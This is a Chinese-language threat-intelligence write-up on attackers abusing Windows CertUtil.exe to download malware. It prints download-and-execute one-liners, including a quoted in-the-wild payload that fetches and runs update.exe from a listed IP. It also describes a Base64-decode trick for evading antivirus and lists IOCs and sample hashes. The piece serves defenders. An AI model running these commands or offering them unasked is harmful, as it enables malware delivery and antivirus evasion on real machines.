1、前言
經過國外文章信息,CertUtil.exe下載惡意軟件的樣本。
2、實現原理
Windows有一個名為CertUtil的內置程序,可用于在Windows中管理證書。使用此程序可以在Windows中安裝,備份,刪除,管理和執行與證書和證書存儲相關的各種功能。
CertUtil的一個特性是能夠從遠程URL下載證書或任何其他文件。
使用語法 :
"certutil.exe -urlcache -split -f [URL] output.file"
Casey Smith(https://twitter.com/subTee) 在2017年就已經公布的相關利用方法。
certutil -urlcache -split -f [serverURL] file.blahregsvr32.exe /s /u /I:file.blah scrub.dll
3、實際例子
目前在威脅情報平臺里已經可以搜索到利用這種手法的相關病毒樣本,樣本中利用的方法:
4、混淆方式
- 使用CertUtil + Base64來繞過安全軟件
通過Base64對惡意文件進行編碼,使惡意代碼樣本看起來像是無害的文本文件,然后使用CertUtil.exe下載后對其進行解碼。下載了文本文件使用“Certutil.exe -decode”命令將Base64編碼文件解碼為可執行文件。
C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txtC:\Temp>certutil.exe -decode bad.txt bad.exe
在F5 Labs上有一篇利用漏洞的文章中提到了利用certutil下載文件的方式攻擊Web服務器。Payload部分內容如下:
一旦文件下載并使用certutil進行 base64解碼,它將被保存為update.exe并執行。
certutil -urlcache -split -f http://45.77.55.231/update.b64 update.b64&certutil -decode update.b64 update.exe&update.exe5、樣本HASH與分析結果
- 分析平臺分析結果:
https://www.hybrid-analysis.com/sample/87cf118bff58c38bc0d54c1d3fcc553e381df838437a99a2006dd8f726406c16?environmentId=100https://www.virustotal.com/en/file/1a3cd50fcc7a454025a641ffcc941353b4a7998c36066b399c72cb8cbff61071/analysis/1522278762/https://www.hybrid-analysis.com/sample/4faf0c88f41121038709e9a9d134736dfadf6e1f1f4fdb6812fc69818a9e8572?environmentId=100https://www.hybrid-analysis.com/sample/3bdecb8b3aaad6822a15011e5c9f10663c3ead64a61350148518b32f176ba02c?environmentId=100
IOC(Indicators of Compromise)
- IP:
45[.]77[.]55[.]231
181[.]214[.]87[.]240
181[.]214[.]87[.]241
148[.]251[.]133[.]246- 文件名與HASH值:
update.b64: 66107b01bc93c8d4cf2e8a6a8faffb56
update.exe: 5bb5d3cb837d97174eddc681ca98aa80
msi64.zip: 8d8b8abe93aea52f9865f045a49912ae
SearchIndexer.exe: 1dd8ea5dd6975eb3d0dd14d71d1a404d
mssearch.exe: 47d3a5023d0cbe76a030bfac7bcfe2f26、參考
https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/
https://f5.com/labs/articles/threat-intelligence/malware/old-dog-new-targets-switching-to-windows-to-mine-electroneum
https://www.bleepingcomputer.com/news/security/regsvr32-can-be-used-to-install-ransomware-through-jscript-installers/
函數)
引用)
